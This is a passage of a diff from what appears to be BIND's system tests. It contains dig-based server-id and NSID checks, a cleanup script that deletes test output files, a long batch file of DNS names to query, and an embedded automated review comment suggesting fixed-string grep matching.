$DIGOPTS +short id.server txt ch @10.53.0.2 > dig.out.ns2.$n +grep "^\"$HOST_NAME\"$" dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that server-id hostname works for EDNS name server ID request ($n)" +$DIG $DIGOPTS +norec +nsid foo @10.53.0.2 > dig.out.ns2.$n +grep "^; NSID: .* (\"$HOST_NAME\")$" dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that custom server-id works for query ($n)" +$DIG $DIGOPTS +short id.server txt ch @10.53.0.3 > dig.out.ns3.$n +grep "^\"this.is.a.test.of.server-id\"$" dig.out.ns3.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that custom server-id works for EDNS name server ID request ($n)" +$DIG $DIGOPTS +norec +nsid foo @10.53.0.3 > 
dig.out.ns3.$n +grep "^; NSID: .* (\"this.is.a.test.of.server-id\")$" dig.out.ns3.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/cacheclean/clean.sh b/bin/tests/system/cacheclean/clean.sh new file mode 100644 index 0000000..b346e65 --- /dev/null +++ b/bin/tests/system/cacheclean/clean.sh @@ -0,0 +1,27 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after cache cleaner tests. +# + +rm -f dig.out.ns2 +rm -f dig.out.expire +rm -f rndc.out.* +rm -f sed.out.* +rm -f */named.memstats +rm -f */named.run +rm -f */named.conf +rm -f ns2/named_dump.db.* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/cacheclean/dig.batch b/bin/tests/system/cacheclean/dig.batch new file mode 100644 index 0000000..d185204 --- /dev/null +++ b/bin/tests/system/cacheclean/dig.batch 
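Review bot: The query checks in builtin/tests.sh build regular expressions from unescaped runtime values, so every `.` in the version or host name acts as a wildcard and a response that differs in those positions would still pass. This affects `grep "^\"$BIND_VERSION\"$"`, the two `grep "^\"$HOST_NAME\"$"` checks and the NSID check `(\"$HOST_NAME\")$`. The rndc status checks earlier in the same script already use `grep -F`; the whole-line checks can do the same with `grep -Fx "\"$BIND_VERSION\""` and `grep -Fx "\"$HOST_NAME\""`. The NSID check needs a prefix match, so there the host name would have to be escaped first or the quoted part extracted and compared literally. A short comment next to the `HOST_NAME=` and `BIND_VERSION=` assignments noting that these values come from `$FEATURETEST --gethostname` and `$NAMED -V`, whose exit status is not checked, would also help.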
@@ -0,0 +1,924 @@ +YA.AKAMAI.com. IN A +UPR1.UPR.CLU.EDU. IN A +integra.s-integra.co.JP. IN A +avalon.iks-jena.de. IN A +NS1.GLOBALDNS.com. IN A +NS.RDU.BELLSOUTH.net. IN A +ns.space.net. IN A +SUN.MHS-RELAY.AC.UK. IN A +AYAX.UNIANDES.EDU.CO. IN A +DNS.NIC.CD. IN A +NS.DNS.PT. IN A +NS1.INTERNETSHARE.com. IN A +MASTER.DNS.BE. IN A +CATAMOUNT.middlebury.EDU. IN A +FM03.FM. IN A +NAAMAK.NCST.ERNET.IN. IN A +gateway2.BFG.com. IN A +NS3.NS.ESAT.net. IN A +DNS1.INTUIT.com. IN A +DEN-NS2.FWIDCSERVICES.net. IN A +SOL.UNDPBI.TELEPAC.net. IN A +NS2.tridog.com. IN A +DNS2.KW. IN A +NS2.MAIL.com. IN A +NS.FIRSTCOM.CL. IN A +DNS4.QUICKEN.com. IN A +bofh.cid.net. IN A +NS1.KRNIC.net. IN A +NS2.SR.net. IN A +NS1.TELSTRA.net. IN A +ns.cafax.SE. IN A +NS1.DNS.NET.NZ. IN A +NS.CONCOURSE.com. IN A +35.32/27.110.16.12.IN-ADDR.ARPA. IN PTR +CCC.champcable.com. IN A +NS.RIPE.net. IN A +NS.NIC.NU. IN A +KIM.CAMNET.CM. IN A +DOGON.SOTELMA.net. IN A +DNS02.FLAME.org. IN A +NS.MIA.BELLSOUTH.net. IN A +mail.ok.RU. IN A +NS.NIC.MX. IN A +NS2.BERKELEY.EDU. IN A +SHIKHAR.MOS.COM.NP. IN A +noc.rrz.Uni-Koeln.de. IN A +NS.KORNET.net. IN A +keith.gazpacho.org. IN A +NS2.appliedtheory.com. IN A +NS.CERNET.net. IN A +smtp.ELISTX.com. IN A +NS-AIT.THNIC.net. IN A +from.PL. IN A +mailhub.icann.org. IN A +SEC1.DNS.UK.PSI.net. IN A +isrv3-i.isc.org. IN A +PHLOEM.UOREGON.EDU. IN A +CTINA.AR. IN A +DNS2.IAM.NET.MA. IN A +10.126.39.137.IN-ADDR.ARPA. IN PTR +DNS.PRINCETON.EDU. IN A +NS.BELLSOUTH.net. IN A +NS1.SNS-FELB.DEBIS.com. IN A +localhost. IN A +hm6.vt.highmeadow.com. IN A +SYRUP.hill.com. IN A +NS99.WAIKATO.AC.NZ. IN A +NS4.CW.net. IN A +NS2.SLOWMOE.com. IN A +ns2.hypa.net. IN A +ns.sxtyptt.NET.CN. IN A +NS2.MERCHANTWARE.com. IN A +uunymdgds1.DOUBLECLICK.net. IN A +e34.co.us.IBM.com. IN A +kista.dns.swip.net. IN A +ZEBRA.UEM.MZ. IN A +NET2.GENDYN.com. IN A +NS0.UTK.EDU. IN A +NS.RELCOM.EU.net. IN A +DNS0.AXION.BT.CO.UK. IN A +mail.vhv.com. IN A +DNS4.UK.MSFT.net. IN A +NS2.ADNS.net. 
IN A +NS1.SEATTLE.US.NETDNS.com. IN A +NS2.UNIVIE.AC.at. IN A +NS15B.BOCA15-VERIO.com. IN A +www.BAYAREA.com. IN CNAME +ns4.onemain.com. IN A +NS2.EDIGITALS.com. IN A +MICHAEL.VATICAN.VA. IN A +AUSTIN.GH.com. IN A +sld-ns2.CNNIC.NET.CN. IN A +NS2.CDC.GOV. IN A +NS.WATSON.IBM.com. IN A +NS.NIC.SH. IN A +NS2.BAHNHOF.net. IN A +NS-AUTH2.cmates.com. IN A +ISDMNL.WR.USGS.GOV. IN A +NS2.COBEX.net. IN A +MERLE.CIRA.CA. IN A +NS.UVG.EDU.GT. IN A +NS1.CWVA.DOUBLECLICK.net. IN A +eliot.diebold.com. IN A +NS.ALMADEN.IBM.com. IN A +NS2.INTERNETSQUARE.com. IN A +mail.QUEST-NET.com. IN A +Z1.NS.LHR1.GLOBIX.net. IN A +DNS1.AVANTEL.NET.MX. IN A +vh80040.vh8.INFI.net. IN A +NS.LEB.net. IN A +NS.DCC.UCHILE.CL. IN A +CLOUSO.RISQ.QC.CA. IN A +muenster.westfalen.de. IN A +us.a1.YIMG.com. IN CNAME +NS.DEMOS.SU. IN A +south.NAVPOINT.com. IN A +netconsult.netconx.de. IN A +DNS2.btinternet.com. IN A +NS2.CINE.net. IN A +castor.cmc.ec.gc.CA. IN A +EX2-DNS0.AVENUEA.com. IN A +firewall3.glaxowellcome.com. IN A +MACU.MA.MT.NP.ELS-GMS.att.net. IN A +NS.PA. IN A +TGSERV.TELE.GL. IN A +KYNSE02.MESSAGESECURE.com. IN A +GORGON.XTRA.CO.NZ. IN A +DNS.NIC.IT. IN A +pop.VERMONTEL.net. IN CNAME +NS2.REGISTRY.HM. IN A +NAMESERVER1.CONCENTRIC.net. IN A +47.131.127.204.IN-ADDR.ARPA. IN PTR +mailhost.tfm.com. IN A +NS1.MRC.GM. IN A +NS.WIDE.AD.JP. IN A +NS.BTA.NET.CN. IN A +NS2.ISPC.org. IN A +BOW.RAIN.FR. IN A +srs.srs.state.vt.us. IN A +NS4.WEB2010.com. IN A +NS.TELECOM.NET.ET. IN A +NS1.DNS.NET.KH. IN A +GATEN.JARING.MY. IN A +shell.nominum.com. IN A +CHEOPS.ANU.EDU.AU. IN A +VANGOGH.CS.BERKELEY.EDU. IN A +NS2.NOC.NULLUS.net. IN A +NIC.LTH.SE. IN A +ns.farm.net. IN A +NS.USEC.SUN.com. IN A +NS2.YOUR-DOMAIN.com. IN A +DNS-EAST.PREP.net. IN A +ns.hcr.net. IN A +NS-RCH.nortelnetworks.com. IN A +crl.DEC.com. IN A +NS.PIXAR.ES. IN A +MEX1-M-213.UNINET.NET.MX. IN A +NS.ITU.CH. IN A +matrix.uwm.EDU.PL. IN A +gateway1.gmcr.com. IN A +NS2.DNS.BR. IN A +foxharp.boston.MA.us. IN MX +Quest-7.symquest.com. 
IN A +NS2.VERIO.net. IN A +NAME.IAD.GBLX.net. IN A +NS2.EMIRATES.NET.AE. IN A +supai.oit.UMASS.EDU. IN A +QUERN.EPILOGUE.com. IN A +NS3.TOPICA.com. IN A +NS1.JERKY.net. IN A +JTB.BRUNET.BN. IN A +AUTH100.NS.UU.net. IN A +BOW.INTNET.DJ. IN A +OSI2.GUA.net. IN A +AZMODAN.ULA.VE. IN A +THUMPER.RPSLMC.EDU. IN A +ICHU.RCP.NET.PE. IN A +NS.NIC.AC. IN A +DNS.NETFLIGHT.com. IN A +ns2.UTORONTO.CA. IN A +mail.giffordmed.org. IN A +RATA.VUW.AC.NZ. IN A +NS-2.ADMONITOR.net. IN A +NCC.MOC.KW. IN A +NS.EUNET.ES. IN A +NS3.best.com. IN A +zip.MAIL-LIST.com. IN MX +JATZ.AARNET.EDU.AU. IN A +DNS2.MAN.LODZ.PL. IN A +NS.VERITAS.com. IN A +218.241.103.199.IN-ADDR.ARPA. IN PTR +BOW.SNPT.KM. IN A +Z1.NS.SJC1.GLOBIX.net. IN A +DNS.NIC.TT. IN A +MAKISIG.IPHIL.net. IN A +NS.DK.net. IN A +NS.NI. IN A +CIUP1.NCC.UP.PT. IN A +ns2.verisign-grs.com. IN A +NS1.UMASS.EDU. IN A +NS.NEWACCOUNT.net. IN A +UDNS2.ULTRADNS.net. IN A +NS2.LATNET.LV. IN A +info-server.surrey.AC.UK. IN A +NS2.SQUONK.net. IN A +NS2.DSO.net. IN A +www.energyenhancement.org. IN A +DNS1.BD. IN A +nl.COMPUWARE.com. IN MX +NS.DHIRAAGU.MV. IN A +TRANTOR.UMD.EDU. IN A +NS.ALCANET.NO. IN A +Z6.MSFT.AKADNS.com. IN A +NS4.ync.net. IN A +CMTU.MT.NS.ELS-GMS.att.net. IN A +vh40099.vh4.INFI.net. IN A +ns2.secondary.nl. IN A +abyssinian.sleepycat.com. IN A +APHEX.MENTOR.BE. IN A +webmail.fiberia.com. IN A +localhost.moonmothers.com. IN A +NS2.DNS.LU. IN A +NS.VISUALCOM.ES. IN A +TONIC.TO. IN A +NS1.CRSNIC.net. IN A +trurl.ispid.com.PL. IN A +datingagentur.de. IN A +NS2.NSIREGISTRY.net. IN A +ICE.VIA-NET-WORKS.IE. IN A +sgi1.map.com. IN A +NS0.HS0.U-NET.net. IN A +candle.pha.pa.us. IN A +NS1.PACIFIC.NET.SG. IN A +NS.CENIAI.NET.CU. IN A +NS2.UUCP.NE.JP. IN A +za.akamaitech.net. IN A +NS.UCR.AC.CR. IN A +DNS-02.NS.cs.com. IN A +dns2.primary.net. IN A +PAPPSRV.PAPP.UNDP.org. IN A +NS1.REGME.com. IN A +DNS.CS.KULEUVEN.AC.BE. IN A +NS1.VERMONTLAW.net. IN A +mail.garmontusa.com. IN A +NS2.SAIPAN.com. IN A +NS.ARICATRA.com. 
IN A +ns2.reedmedia.net. IN A +NS.NETLAB.SK. IN A +RELAY.GW.tislabs.com. IN A +b.ns.tmcs.net. IN A +NS1.IBL.BM. IN A +ok.RU. IN A +NS.RICC.ALMA-ATA.SU. IN A +KITKA.MARNET.MK. IN A +dasher.dartmouth.EDU. IN A +NS0.PLANET-THREE.com. IN A +KNOCK.SER.BBNPLANET.net. IN A +tornado.webtech.elk.PL. IN A +AUTH2.NS.IDT.net. IN A +host3.VTLEGALAID.org. IN A +NS.EUNET.SK. IN A +TULKU.NIC.AR. IN A +RELAY.CDNNET.CA. IN A +DNS2.TPSA.PL. IN A +enterprise.wirbel.com. IN A +ECNET.EC. IN A +ENGINE1.UNA.net. IN A +WYCU.WY.BR.NP.ELS-GMS.att.net. IN A +ARWENA.NASK.WAW.PL. IN A +PAC2.NIPR.MIL. IN A +DAISY.EE.UND.AC.ZA. IN A +odin.ietf.org. IN A +dns.kaben-net.de. IN A +NS2.ALTAVISTA.com. IN A +CASTOR.TELEGLOBE.net. IN A +CIR.RED.SV. IN A +PIJIN.COM.SB. IN A +NS4.CTCCOM.net. IN A +NS1.SOL.NO. IN A +DNS2.TK.MSFT.net. IN A +NS.BSDI.com. IN A +NS.SVIANED.nl. IN A +NS.NOVELL.com. IN A +NS.LUCKY.net. IN A +SJC-NS2.SJC.LYCOS.com. IN A +NS1.OP.net. IN A +worldnet.att.net. IN A +APIES.FRD.AC.ZA. IN A +mail.skiinsurance.com. IN A +NS.BELNET.BE. IN A +KOMO.INET.GA. IN A +EARTH.THEPLANET.net. IN A +VASCO.USMA.AC.PA. IN A +GODFEVER.DCCSERVER.com. IN A +BOS-NS2.BOS.LYCOS.com. IN A +NS2.GOTO.com. IN A +NS1.overstock.com. IN A +NS1-PUBLIC.ZMA.COMPAQ.com. IN A +ns.ilovedomain.com. IN A +ns1.anycast.net. IN A +PASCAL.UPRR.PR. IN A +NS3-AUTH.SPRINTLINK.net. IN A +NS1-Y.DNS.PIPEX.net. IN A +prue.eim.surrey.AC.UK. IN A +TROLL-GW.GATECH.EDU. IN A +NS.SIERRATEL.SL. IN A +ns2.PSHIFT.com. IN A +NS.ERS.IBM.com. IN A +ASLAN.OPEN-RSC.org. IN A +NS2.DOMAIN-REGISTRY.nl. IN A +uranus.lan-ks.de. IN A +mail.unlisys.net. IN A +NS.AUSTRIA.EU.net. IN A +AUTH01.CONNECT.IE. IN A +SUN.SCSI.GOV.BY. IN A +NS1.SIGMAHOSTING.com. IN A +NS.CAST.EDU.JM. IN A +DS.NIC.NET.SG. IN A +PRADES.CESCA.ES. IN A +ns.sta.NET.CN. IN A +NSE00.excite.com. IN A +NS3.ABOVE.net. IN A +CASBAH.ELDJAZAIR.NET.DZ. IN A +ASKIA.SOTELMA.ML. IN A +NS.IDT.net. IN A +FXCLPR02.IS.CHRYSLER.com. IN A +SVC00.APNIC.net. IN A +NS5.DCX.YAHOO.com. IN A +ns1.ray.net. 
IN A +NS.NIC.MC. IN A +ns.runway.CN.net. IN A +benoni.uit.NO. IN A +SCRATCHY.MINDSPRING.net. IN A +ns1.pcode.com. IN A +ns1.aha.RU. IN A +ns2.uwaterloo.CA. IN A +ns2.NIC.AD.JP. IN A +a.ns.foxharp.boston.MA.us. IN A +NS.NIC.IO. IN A +A-GTLD-SERVERS.dot-god.com. IN A +SMTP.slac.stanford.EDU. IN A +52.87.198.209.IN-ADDR.ARPA. IN PTR +BARNEY.ADVSYS.CO.UK. IN A +NS1.TELEPAC.PT. IN A +NICOSIA.CCS.UCY.AC.CY. IN A +NS.PUNCHDOWN.org. IN A +SYNAESTHESIA.COGNOSCENTI.org. IN A +NS2.PLANET-THREE.net. IN A +DNS.CIT.CORNELL.EDU. IN A +MODOR.VERISIGN.net. IN A +SUNSTROKE.IS.RPSLMC.EDU. IN A +NS2.SEG.net. IN A +NEMUNAS.SC-UNI.KTU.LT. IN A +MULGA.CS.MU.OZ.AU. IN A +NS1.NPLUS.GF. IN A +ns2.centralinfo.net. IN A +K.GTLD-SERVERS.net. IN A +ns1.codelocal.com. IN A +NS2.IPNS.com. IN A +NS0.DE.NIC.NU. IN A +NS.USSR.EU.net. IN A +NS.INTERNET.SK. IN A +CORREOS.SEKER.ES. IN A +mx1.buf.ADELPHIA.net. IN A +aun.UNINETT.NO. IN A +NS0.NETANET.com. IN A +www.MANY-PATHS-ENERGY-ENHANCEMENT.com. IN A +NS2.STARFIRE.DOUGLAS.MA.us. IN A +NS3.IKP.PL. IN A +pns.dtag.de. IN A +NZ.NS.NIC.NU. IN A +DAVER.bungi.com. IN A +gutenberg.bucksnet.com. IN A +DNS2.IT.net. IN A +NS2.SNS-UT.DEBIS.com. IN A +ISI.EDU. IN A +amethyst.xaos.org. IN A +PAPPILLOMA.WWEBSVS.com. IN A +NS2.bock.com. IN A +NS2.OAR.net. IN A +MINION.NETPOLICY.com. IN A +Mail.catic1.com. IN A +NS4.DNS.space.net. IN A +b.gtld-servers.ORSC. IN A +bend.madriver.com. IN A +NS4.IS-FUN.net. IN A +NS2.JPS.net. IN A +NS1.IP-PLUS.net. IN A +rush.cc1.RPSLMC.EDU. IN A +NS2.GBMTECH.net. IN A +DNS.MSEN.com. IN A +DNSSEC2.SINGNET.COM.SG. IN A +NS2.HOME.net. IN A +ACCESS.MBNET.MB.CA. IN A +DNS0.SPIN.AD.JP. IN A +Filer.PHOTOTRUST.com. IN A +jpl.NASA.GOV. IN A +NS2.TECHNOLOGIA.net. IN A +bparker.CONNACTIVITY.com. IN A +NS1.uvm.EDU. IN A +NS.SENET.net. IN A +DNS2.UTCC.UTORONTO.CA. IN A +localhost.costorf.com. IN A +DNS2.AD. IN A +HYDRA.HELSINKI.FI. IN A +NAME.PHX.GBLX.net. IN A +NS2.FOOL.com. IN A +NS01-SERVER.CURINFO.AN. IN A +NS.CR. IN A +mail.pshift.net. 
IN A +NS.IRD.FR. IN A +NS.UZ. IN A +DNS.INTELCOM.SM. IN A +DNS2.UNIV-NKC.MR. IN A +HNS3.hns.com. IN A +bay.cs.UTORONTO.CA. IN A +NS0.BT.net. IN A +BAYONET.SJMERCURY.com. IN A +PAN.BIJT.net. IN A +NAVI.SUBTEND.net. IN A +NS.CIX.CX. IN A +waldorf.Informatik.Uni-Dortmund.de. IN A +NS2.ivillage.com. IN A +DNS.NIC.XLINK.net. IN A +NS1.MERCHANTWARE.CON. IN A +NS.TO.GD-ES.com. IN A +NS-A.RNC.RO. IN A +REGGAE.NCREN.net. IN A +SSS-NL.DENIC.de. IN A +NS1.TDC.TO. IN A +NS.NIC.HU. IN A +JOANNA.WILLIAM.org. IN A +NS0.IIJ.AD.JP. IN A +maus.spack.org. IN A +B.NS.VERIO.net. IN A +SECDNS.EUNET.BE. IN A +NS3.EUROPE.YAHOO.com. IN A +A.ROOT-SERVERS.net. IN A +sherickpm.com. IN MX +NS2.MEDIASERVICES.net. IN A +YARDBIRD.CNS.vt.EDU. IN A +SUNIC.SUNET.SE. IN A +NS.MT. IN A +CNDVG001.usa.net. IN A +NS1.CX.ESCROW.IOCOMM.NET.CX. IN A +DNS-02.NS.AOL.com. IN A +ns2.tesserae.com. IN A +SV10.BATELCO.COM.BH. IN A +dec.anr.state.vt.us. IN MX +3.133.188.192.IN-ADDR.ARPA. IN PTR +NS1.LONDON.UK.NETDNS.com. IN A +NS.NIC.MG. IN A +DNS1.VN. IN A +DENS20.DEN.nps.GOV. IN A +z.ip6.INT. IN A +NS3.TRIVALLEY.com. IN A +isis.imag.FR. IN A +NS.SOVAM.com. IN A +NS-SOA.DARENET.DK. IN A +NS4.NIC.TV. IN A +DNSSRV1X.mitre.org. IN A +GATEKEEPER.NYTIMES.com. IN A +D.I-DNS.net. IN A +NS.KOLO.net. IN A +NS4.FIRSTWORLD.net. IN A +DECST.CERIST.DZ. IN A +NS4.DNS.WS. IN A +NS0.GDGSC.com. IN A +UCTHPX.UCT.AC.ZA. IN A +NS2.HOTWIRED.com. IN A +ns02.ca.us.ibm.net. IN A +NS2.SPEAKEASY.net. IN A +TELCOM.ZPTC.CO.ZW. IN A +NS.DK-HOSTMASTER.DK. IN A +NS.NIC.LK. IN A +NS2.zama.net. IN A +CZ.EUNET.CZ. IN A +NS.AC.ID. IN A +NS1.CUBE.de. IN A +NS1.QUASAR.net. IN A +NS1.OFFSHORE.AI. IN A +NS5.NRSITE.com. IN A +NS.AIC.net. IN A +OWL.NCC.nps.GOV. IN A +MAXIM.gbch.net. IN A +BOW.INTNET.TD. IN A +ns1.cacheware.com. IN A +NS2.SPEEDHOST.com. IN A +NS1.COMMIT.GM. IN A +NAME.ROC.GBLX.net. IN A +90.198.245.204.IN-ADDR.ARPA. IN PTR +BOLOGNA.NETTUNO.IT. IN A +NIC.IBD.com. IN A +NS.WESTOL.com. IN A +time.SOVER.net. IN CNAME +UNIX1.CS.UMASS.EDU. 
IN A +AARDVARK.WR.UMIST.AC.UK. IN A +NS1.NIC.YU. IN A +mail.velco.com. IN A +DNSAUTH2.SYS.GTEI.net. IN A +NS.TELE.FI. IN A +state.vt.us. IN MX +NS.NYC.juno.com. IN A +NS1.g-world.com. IN A +AUTH2.AMERICA.net. IN A +KIRA.ECS.UMASS.EDU. IN A +CONACYT.GOB.SV. IN A +DNS.SRCE.HR. IN A +NS00.ns0.com. IN A +NS2.CL.BELLSOUTH.net. IN A +jenner.med.HARVARD.EDU. IN A +p2.cavebear.com. IN A +NS1.NIC.JE. IN A +ORCU.OR.BR.NP.ELS-GMS.att.net. IN A +NS.XBILL.org. IN A +WRAITH.CS.UOW.EDU.AU. IN A +12.159.145.204.IN-ADDR.ARPA. IN PTR +ns1.pr.SUN.com. IN A +NS.SPIN.OMNES.net. IN A +smtp.188.net. IN A +TERMINAL.2GLOBE.net. IN A +NS2.HARVARD.EDU. IN A +NAMESERVER.CNR.IT. IN A +EARTH.SY. IN A +DNS2.REACCIUN.VE. IN A +NS.TMX.COM.NI. IN A +freefour.acs.rpi.EDU. IN A +242.84.198.209.IN-ADDR.ARPA. IN PTR +CORREU.STA.AD. IN A +NS.DRUKNET.NET.BT. IN A +NS4.US.PRSERV.net. IN A +KAASASSUK.GH.GL. IN A +ECUA.NET.EC. IN A +NS.CONCYT.GOB.GT. IN A +NS2.NAP.net. IN A +DNS2.CN.net. IN A +MX.NSI.NASA.GOV. IN A +NS.TDS.net. IN A +tdns-me1.NETSCAPE.com. IN A +NS2.METU.EDU.TR. IN A +NS2.SETARNET.AW. IN A +87.184.152.204.IN-ADDR.ARPA. IN PTR +DNS.OMNIWAY.SM. IN A +NS0.U-NET.net. IN A +elektro.CMHNET.org. IN A +ns2.HIGGS.net. IN A +NS2.SKYNETWEB.com. IN A +MAGIC.MN. IN A +NS1.YAHOO.com. IN A +mx1.cdp.ADELPHIA.net. IN A +SANTO.VANUATU.COM.VU. IN A +www.mmuuf.org. IN MX +ns1.timeheart.net. IN A +NS2.TOGETHER.net. IN A +NS.AMNIC.net. IN A +NS.EENET.EE. IN A +www.ONLINEPHOTOCONTEST.com. IN A +VIC20.BLIPP.com. IN A +DNS.FROGHOUSE.org. IN A +NS2.ELI.net. IN A +NS.CAIS.com. IN A +BAABEN.AFRIQ.net. IN A +NS2.NJ.EXODUS.net. IN A +DOMREG.NIC.CH. IN A +NS.EU.net. IN A +NS1.DIEBOLD.net. IN A +NS3.CP.net. IN A +DNS.FUW.EDU.PL. IN A +www.retro.com. IN A +NS2.UNI2.net. IN A +ns1.alcatrazmedia.com. IN A +dns6.CP.MSFT.net. IN A +NS1.SEYCHELLES.net. IN A +NS2.INTERNIC.net. IN A +front.macrosoft.WAW.PL. IN A +NISC.JVNC.net. IN A +AUTH03.NS.DE.UU.net. IN A +BURDELL.CC.GATECH.EDU. IN A +NS4.AH.net. IN A +ns1.sgh-net.de. 
IN A +Leland2.stanford.EDU. IN A +CBRU.BR.NS.ELS-GMS.att.net. IN A +DENEB.DOMAINNT.net. IN A +ns1.ivm.net. IN A +NS0.CWCI.net. IN A +35.110.16.12.IN-ADDR.ARPA. IN CNAME +f.trns. IN A +ODISEJ.TELEKOM.YU. IN A +FRCU.EUN.EG. IN A +NS.HHS.net. IN A +FOO.GRNET.GR. IN A +mail.WonderWorks.com. IN A +NS1.IAFRICA.com. IN A +NS.KACST.EDU.SA. IN A +srs.state.vt.us. IN A +OM4.OMANTEL.NET.OM. IN A +Yeshua.Christ.com. IN A +NS1.SIMORGH.com. IN A +OLKETA.SOLOMON.COM.SB. IN A +BANBA.DOMAINREGISTRY.IE. IN A +NOC.IOS.com. IN A +ns.schnism.net. IN A +e4.ny.us.IBM.com. IN A +DNS2.SEANET.com. IN A +doubt.dd.org. IN A +AMBER.ELEKTRON.PL. IN A +gw.rge.com. IN A +NS2.ZTNET.com. IN A +NS3.INFI.net. IN A +ZA.AKADNS.net. IN A +ESTIA.CSI.FORTH.GR. IN A +vtagr04.agr.state.vt.us. IN A +NS1-PUBLIC.ZTX.COMPAQ.com. IN A +ADMII.ARL.MIL. IN A +NS.NIXU.FI. IN A +DNS2.PIONEERNET.net. IN A +NS.NIC.CL. IN A +NS2.UTZ. IN A +NS4.LUXNOC.com. IN A +NS2.PBI.net. IN A +annwfn.erfurt.thur.de. IN A +NS1.MW.mediaone.net. IN A +NS1.ISU.NET.SA. IN A +pop.SHOREHAM.net. IN CNAME +DNS2.GUERNSEY.net. IN A +NS1.BEACHSHORE.net. IN A +HKUXB.HKU.HK. IN A +NS.DOLEH.com. IN A +NS.hactrn.net. IN A +MALAKULA.BONDY.IRD.FR. IN A +NS1.mediaone.net. IN A +NS2.GPG.com. IN A +noc.BelWue.de. IN A +NS2.GIP.net. IN A +RS.ISLES.net. IN A +BOW.INTNET.GQ. IN A +A.OPEN.BY. IN A +us.i1.YIMG.com. IN CNAME +athome.wetlogic.net. IN CNAME +NS1.NIST.GOV. IN A +mail.jerusalem-mail.com. IN A +ISDSUN.cr.USGS.GOV. IN A +NS.BOSTON.juno.com. IN A +NS2.CADABRA.com. IN A +nps.GOV. IN MX +RELAY.HUJI.AC.IL. IN A +styx.tahina.priv.at. IN A +ISGATE.IS. IN A +ns0.lux.dot-eu.org. IN A +BILBO.NASK.ORG.PL. IN A +MAIL.TARSUS.com. IN A +SUN.REDIRIS.ES. IN A +NS2.NEASE.net. IN A +OHCU.OH.MT.NP.ELS-GMS.att.net. IN A +NS2.NF. IN A +MIRAF-SERVER3.HONDUTEL.HN. IN A +ns3.worldnet.att.net. IN A +NS2.NETNAMES.net. IN A +ITGBOX.IAT.CNR.IT. IN A +NS2.ADELPHIA.net. IN A +NS2.RIPN.net. IN A +NS1.cinenet.net. IN A +jengate.thur.de. IN A +NOC.ULCC.JA.net. IN A +NS.NOC.UZ. 
IN A +NS0.JA.net. IN A +NS2.INR.net. IN A +netsage.org. IN A +TERI.USP.AC.FJ. IN A +NS2.NETSOL.com. IN A +NS2.ABAC.com. IN A +NS2.NIC.FR. IN A +KANIN.ARNES.SI. IN A +NS.EDU.GU. IN A +DNS.INRIA.FR. IN A +HEDNS1.GOOGLE.com. IN A +asylum.sf.ca.us. IN A +ACT2.ACT2000.net. IN A +ICM1.ICP.net. IN A +202.192.103.198.209.IN-ADDR.ARPA. IN PTR +ECSEL.jhuapl.EDU. IN A +NS2.DCNY.DOUBLECLICK.net. IN A +keith.netsage.org. IN A +MANTA.OUTREMER.com. IN A +NS2.globalnetisp.net. IN A +NS2.CCSRS.net. IN A +NS1.NL.CONCENTRIC.com. IN A +NS2.VI.net. IN A +NS2.NEO.net. IN A +cgi.MERCURYCENTER.com. IN CNAME +ORSTOM.RIO.net. IN A +NS2.CONRADPROMOTIONS.com. IN A +YARRINA.CONNECT.COM.AU. IN A +dns03.OPS.usa.net. IN A +APPSRV.HAITIWORLD.com. IN A +NS.RELCOM.KZ. IN A +NS1.MAGIC-MOMENTS.com. IN A +NS.ALCATEL.com. IN A +ns2.terra.net. IN A +NS3.hotmail.com. IN A +vtc.VSC.EDU. IN MX +www.vmba.org. IN MX +NAHOURI.ONATEL.BF. IN A +SERVER2.INFN.IT. IN A +NS2.AI-R.com. IN A +NS1.FREE.net. IN A +vcmr-54.server.rpi.EDU. IN A +haig.CS.UCL.AC.UK. IN A +mail.nova-data.com. IN A +MOEVAX.EDU.TW. IN A +NS2.LTWCC.org. IN A +NS.BA. IN A +noc.HRZ.uni-bielefeld.de. IN A +VANILLA.WRO.nps.GOV. IN A +NS2.SZTAKI.HU. IN A +SECIU.EDU.UY. IN A +COL2.CARIBSURF.com. IN A +NS2.QATAR.NET.QA. IN A +NS2.E-SYNC.net. IN A +ns1.eu.SUN.com. IN A +NS1.UUSJ.DOUBLECLICK.net. IN A +NS2.CUHK.EDU.HK. IN A +NS1.MEITCA.com. IN A +NS2.DSL.net. IN A +techfac.techfak.uni-bielefeld.de. IN A +listserv.performancediver.com. IN A +foolusmf.D4P.net. IN CNAME +pedic-med.vrx.net. IN A +GRUMPY.NET.NA. IN A +BK.tifosi.com. IN A +ns3.PAIR.com. IN A +ns2.ar.com. IN A +MASSIRA.ONPT.NET.MA. IN A +NS.KBFI.EE. IN A +ns3.Algebra.com. IN A +faerber.muc.de. IN MX +9.206.203.192.IN-ADDR.ARPA. IN PTR +PUKU.UNZA.ZM. IN A +ATLNET.ATLONLINE.com. IN A +Z1.NS.NYC1.GLOBIX.net. IN A +www.hometownbands.com. IN A +SIMON.CS.CORNELL.EDU. IN A +EKEKO.RCPIP.net. IN A +emerald.itnet.com.PL. IN A +DNS1.ICS.FORTH.GR. IN A +NS.ATL.BELLSOUTH.net. IN A +ntp.ctr.COLUMBIA.EDU. 
